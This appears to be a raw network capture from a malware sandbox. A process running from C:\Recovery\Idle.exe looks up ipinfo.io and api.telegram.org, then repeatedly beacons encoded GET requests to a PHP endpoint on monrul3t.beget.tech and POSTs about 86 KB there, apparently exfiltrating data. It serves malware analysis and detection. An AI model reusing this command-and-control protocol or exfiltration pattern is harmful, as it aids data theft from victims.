                                                                                            Jan 11, 2025 18:10:18.943605900 CET192.168.2.45.101.152.154cf0Echo
                                                                                            Jan 11, 2025 18:10:19.002784014 CET5.101.152.15192.168.2.454f0Echo Reply
                                                                                            Jan 11, 2025 18:10:19.003531933 CET192.168.2.45.101.152.154cefEcho
                                                                                            Jan 11, 2025 18:10:19.062809944 CET5.101.152.15192.168.2.454efEcho Reply
                                                                                            Jan 11, 2025 18:10:24.070004940 CET192.168.2.45.101.152.154ceeEcho
                                                                                            Jan 11, 2025 18:10:24.129622936 CET5.101.152.15192.168.2.454eeEcho Reply
                                                                                            Jan 11, 2025 18:10:24.130702019 CET192.168.2.45.101.152.154cedEcho
                                                                                            Jan 11, 2025 18:10:24.190500975 CET5.101.152.15192.168.2.454edEcho Reply
                                                                                            Jan 11, 2025 18:10:24.191977978 CET192.168.2.45.101.152.154cecEcho
                                                                                            Jan 11, 2025 18:10:24.251033068 CET5.101.152.15192.168.2.454ecEcho Reply
                                                                                            Jan 11, 2025 18:10:29.255100965 CET192.168.2.45.101.152.154cebEcho
                                                                                            Jan 11, 2025 18:10:29.314239979 CET5.101.152.15192.168.2.454ebEcho Reply
                                                                                            Jan 11, 2025 18:10:29.328185081 CET192.168.2.45.101.152.154ceaEcho
                                                                                            Jan 11, 2025 18:10:29.387126923 CET5.101.152.15192.168.2.454eaEcho Reply
                                                                                            Jan 11, 2025 18:10:29.390194893 CET192.168.2.45.101.152.154ce9Echo
                                                                                            Jan 11, 2025 18:10:29.449141026 CET5.101.152.15192.168.2.454e9Echo Reply
                                                                                            Jan 11, 2025 18:10:34.473673105 CET192.168.2.45.101.152.154ce8Echo
                                                                                            Jan 11, 2025 18:10:34.533700943 CET5.101.152.15192.168.2.454e8Echo Reply
                                                                                            Jan 11, 2025 18:10:34.536443949 CET192.168.2.45.101.152.154ce7Echo
                                                                                            Jan 11, 2025 18:10:34.595455885 CET5.101.152.15192.168.2.454e7Echo Reply
                                                                                            Jan 11, 2025 18:10:34.599889040 CET192.168.2.45.101.152.154ce6Echo
                                                                                            Jan 11, 2025 18:10:34.658965111 CET5.101.152.15192.168.2.454e6Echo Reply
                                                                                            Jan 11, 2025 18:10:39.661072969 CET192.168.2.45.101.152.154ce5Echo
                                                                                            Jan 11, 2025 18:10:39.720129013 CET5.101.152.15192.168.2.454e5Echo Reply
                                                                                            Jan 11, 2025 18:10:39.720818043 CET192.168.2.45.101.152.154ce4Echo
                                                                                            Jan 11, 2025 18:10:39.779766083 CET5.101.152.15192.168.2.454e4Echo Reply
                                                                                            Jan 11, 2025 18:10:39.780726910 CET192.168.2.45.101.152.154ce3Echo
                                                                                            Jan 11, 2025 18:10:39.839675903 CET5.101.152.15192.168.2.454e3Echo Reply
                                                                                            Jan 11, 2025 18:10:39.839850903 CET192.168.2.45.101.152.15fcfd(Protocol unreachable)Destination Unreachable
                                                                                            Jan 11, 2025 18:10:44.833049059 CET192.168.2.45.101.152.154ce2Echo
                                                                                            Jan 11, 2025 18:10:44.892443895 CET5.101.152.15192.168.2.454e2Echo Reply
                                                                                            Jan 11, 2025 18:10:44.895823956 CET192.168.2.45.101.152.154ce1Echo
                                                                                            Jan 11, 2025 18:10:44.954802036 CET5.101.152.15192.168.2.454e1Echo Reply
                                                                                            Jan 11, 2025 18:10:44.955832958 CET192.168.2.45.101.152.154ce0Echo
                                                                                            Jan 11, 2025 18:10:45.015059948 CET5.101.152.15192.168.2.454e0Echo Reply
                                                                                            Jan 11, 2025 18:10:50.020528078 CET192.168.2.45.101.152.154cdfEcho
                                                                                            Jan 11, 2025 18:10:50.079766989 CET5.101.152.15192.168.2.454dfEcho Reply
                                                                                            Jan 11, 2025 18:10:50.081724882 CET192.168.2.45.101.152.154cdeEcho
                                                                                            Jan 11, 2025 18:10:50.141940117 CET5.101.152.15192.168.2.454deEcho Reply
                                                                                            Jan 11, 2025 18:10:50.142971039 CET192.168.2.45.101.152.154cddEcho
                                                                                            Jan 11, 2025 18:10:50.201947927 CET5.101.152.15192.168.2.454ddEcho Reply
                                                                                            Jan 11, 2025 18:10:55.207983971 CET192.168.2.45.101.152.154cdcEcho
                                                                                            Jan 11, 2025 18:10:55.267340899 CET5.101.152.15192.168.2.454dcEcho Reply
                                                                                            Jan 11, 2025 18:10:55.273921013 CET192.168.2.45.101.152.154cdbEcho
                                                                                            Jan 11, 2025 18:10:55.321866989 CET192.168.2.45.101.152.154cdaEcho
                                                                                            Jan 11, 2025 18:10:55.333020926 CET5.101.152.15192.168.2.454dbEcho Reply
                                                                                            Jan 11, 2025 18:10:55.333390951 CET192.168.2.45.101.152.15fcfd(Protocol unreachable)Destination Unreachable
                                                                                            Jan 11, 2025 18:10:55.381644964 CET5.101.152.15192.168.2.454daEcho Reply
                                                                                            Jan 11, 2025 18:11:00.395750046 CET192.168.2.45.101.152.154cd9Echo
                                                                                            Jan 11, 2025 18:11:00.455275059 CET5.101.152.15192.168.2.454d9Echo Reply
                                                                                            Jan 11, 2025 18:11:00.456269026 CET192.168.2.45.101.152.154cd8Echo
                                                                                            Jan 11, 2025 18:11:00.515583992 CET5.101.152.15192.168.2.454d8Echo Reply
                                                                                            Jan 11, 2025 18:11:00.517815113 CET192.168.2.45.101.152.154cd7Echo
                                                                                            Jan 11, 2025 18:11:00.576800108 CET5.101.152.15192.168.2.454d7Echo Reply
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 18:07:15.762706995 CET | 192.168.2.4 | 1.1.1.1 | 0x20c7 | Standard query (0) | monrul3t.beget.tech | A (IP address) | IN (0x0001) | false
Jan 11, 2025 18:07:18.003089905 CET | 192.168.2.4 | 1.1.1.1 | 0x148d | Standard query (0) | ipinfo.io | A (IP address) | IN (0x0001) | false
Jan 11, 2025 18:07:19.340400934 CET | 192.168.2.4 | 1.1.1.1 | 0xbd15 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 18:07:15.827383995 CET | 1.1.1.1 | 192.168.2.4 | 0x20c7 | No error (0) | monrul3t.beget.tech | | 5.101.152.15 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 18:07:18.010760069 CET | 1.1.1.1 | 192.168.2.4 | 0x148d | No error (0) | ipinfo.io | | 34.117.59.81 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 18:07:19.347361088 CET | 1.1.1.1 | 192.168.2.4 | 0xbd15 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                                            • ipinfo.io
                                                                                            • api.telegram.org
                                                                                            • monrul3t.beget.tech
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 51288 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                            Jan 11, 2025 18:07:15.838148117 CET470OUTGET /c243cb78.php?md25=UA&vb=r948xSj667Ud7PLnWmgd&60bc32dfe02b37c4e360dca40128d82d=989faea0cce1115f683b114ca580d3df&9d38ba4b7300523a983f9d7476ad101b=QYlZ2YlVWOiVTYjF2N3MjNjFDNyMjYwEDZ3I2YmdjZzUmNidjY5ETZ&md25=UA&vb=r948xSj667Ud7PLnWmgd HTTP/1.1
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
Jan 11, 2025 18:07:16.689215899 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:07:16 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 2160
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Jan 11, 2025 18:07:16.735327005 CET759OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nIkJWYmZWM1cTNkRzMhVzMiVWY0MzYwITOjFjNyUGO1kjZwgjMkhTYxIiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Jan 11, 2025 18:07:16.870018005 CET810OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&c9ac4e72985eee3d90507dfb878ca2be=0VfiIiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiIzMDNhdTO3MmYxIjMmJDOwIDO0MWO3YmZwE2YxQjZzETMjhDO3YmYhJiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
Jan 11, 2025 18:07:16.963927031 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:07:16 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
Jan 11, 2025 18:07:17.099844933 CET | 221 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:07:16 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 0
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Jan 11, 2025 18:07:17.102787018 CET2809OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&12c459a86df5a98a63f3de23b4087211=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 [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
Jan 11, 2025 18:07:17.351427078 CET | 221 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:07:17 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 0
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            X-Powered-By: PHP/8.2.22


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 53636 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                            Jan 11, 2025 18:07:16.741200924 CET759OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nIklzY3IWN4IDNlVWO4MWO4MzY2YWMhdTO4YGN5czMwQGMwUDOjZ2YxIiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
Jan 11, 2025 18:07:17.477341890 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:07:17 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 31 55 44 4e 79 51 54 5a 79 51 32 59 6d 6c 6a 4e 34 4d 6d 59 6a 4a 54 5a 30 45 6a 59 30 49 6a 4e 31 45 44 5a 7a 45 32 4e 7a 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6ICN1UDNyQTZyQ2YmljN4MmYjJTZ0EjY0IjN1EDZzE2NzIye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye
Jan 11, 2025 18:07:17.481484890 CET | 2309 | OUT | GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMlWVtRGcSNTWCpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZ [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
Jan 11, 2025 18:07:17.882611990 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:07:17 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 53642 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 18:07:22.204448938 CET | 837 | OUT | GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&c9ac4e72985eee3d90507dfb878ca2be=QX9JSUNJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3IDNiR2NlZDZxQGZ3QDM2YzMyEmM1UjN0YDOjlTM4ITYyQmMlljZxIiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
Jan 11, 2025 18:07:23.119805098 CET | 221 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:07:22 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 0
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            X-Powered-By: PHP/8.2.22
Jan 11, 2025 18:07:23.125905991 CET | 570 | OUT | POST /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary=----------WebKitFormBoundaryJp3V6slVJ7hXe8d3
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                            Host: monrul3t.beget.tech
                                                                                            Content-Length: 86203
                                                                                            Expect: 100-continue
Jan 11, 2025 18:07:23.352438927 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 18:07:23.865328074 CET | 221 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:07:23 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 0
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            X-Powered-By: PHP/8.2.22


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 53643 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 18:07:22.949912071 CET | 2972 | OUT | GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=0VfiIiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYisHL9JCMYZWaJRUT2klaNZTUE1UavpWStpleONTUE9EbGRlTzUleNJTTy0UNVRlWpJVbZhXUq5ENRJjT0UkMOtmRtlFaKdVWsp1RapXSDxUaVNUT6lUaPl2aE1EeZR1TppEVNtmRt50MjpWT4tGROhXUE5EbSpnT00keNpXQq5UbOJTT3FFRNNT [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
Jan 11, 2025 18:07:23.950131893 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:07:23 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 53644 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 18:07:28.963996887 CET | 2948 | OUT | GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=0VfiIiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYisHL9JCMYZWajRkT20keNZTUE1UavpWStpleONTUE9EbGRlTzUleNJTTy0UNVRlWpJVbZhXUq5ENRJjT0UkMOtmRtlFaKdVWsp1RapXSDxUaVNUT6lUaPl2aE1EeZR1TppEVNtmRt50MjpWT4tGROhXUE5EbSpnT00keNpXQq5UbOJTT3FFRNNT [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
Jan 11, 2025 18:07:29.697926044 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:07:29 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
